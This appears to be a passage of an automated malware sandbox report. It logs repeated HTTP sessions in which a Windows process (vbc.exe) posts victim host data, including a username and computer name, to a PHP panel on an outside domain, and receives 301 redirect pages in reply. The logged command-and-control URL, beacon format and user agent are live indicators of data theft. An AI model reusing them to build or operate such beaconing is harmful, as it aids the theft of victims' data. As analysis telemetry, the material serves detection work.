                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:07.230614901 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  30192.168.2.54985392.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:07.733023882 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:07.852653980 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:09.430635929 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:09 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: b32c3c944fac3edc0025172ed49f1adf-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.337
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:09.430753946 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  31192.168.2.54985992.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:09.705409050 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:09.825571060 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:11.446013927 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:11 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 7eb7af8b6bc25c3616443dd09025f0bf-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.379
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:11.446043015 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  32192.168.2.54986492.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:11.709115982 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:11.829832077 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:13.344949961 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:13 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 28c973e5fd310230d0634bca20729a5f-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.379
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:13.344963074 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  33192.168.2.54987092.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:13.626626968 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:13.746541977 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:15.306358099 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:15 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 7c193611e00a46fc5fedc6534f6b05cb-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.334
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:15.306508064 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  34192.168.2.54987592.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:15.581584930 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:15.701196909 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:17.173873901 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:16 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 0757f01e24446f98bc113dd0fe0a5d64-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.334
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:17.173912048 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  35192.168.2.54987992.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:17.571537971 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:17.691250086 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:19.186173916 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:18 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 5872a60f481acf5d6ce99b87e93188fd-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.358
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:19.186192989 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  36192.168.2.54988592.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:19.461146116 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:19.580921888 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:21.159703016 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:20 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 8039a5a027759047ae17a1fa420efdb4-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.339
